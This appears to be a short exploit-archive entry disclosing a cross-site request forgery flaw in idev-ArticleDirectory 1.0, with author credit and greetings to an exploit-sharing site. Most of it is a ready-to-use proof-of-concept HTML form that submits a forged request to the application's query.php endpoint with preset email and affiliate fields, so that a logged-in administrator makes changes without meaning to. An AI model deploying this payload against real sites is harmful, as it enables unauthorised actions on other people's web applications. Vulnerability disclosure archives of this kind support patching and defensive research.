idev-ArticleDirectory 1.0 suffers from a cross site request forgery vulnerability.
da6d8e86c08092d0432fb194bfeb3670dd734416efd9adca9904ce4aa50fcd77
# Exploit Title: idev-ArticleDirectory 1.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-articledirectory/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="../library/query.php?addphoto=1" method="post" name="form1" enctype="multipart/form-data" id="form1">
<input name="EMAIL" class="textarea100" value="mail@mail.com" type="hidden">
<input name="AFFID" class="textarea100" value="" type="text">
<input name="Submit" value="Submit" type="submit">
</form>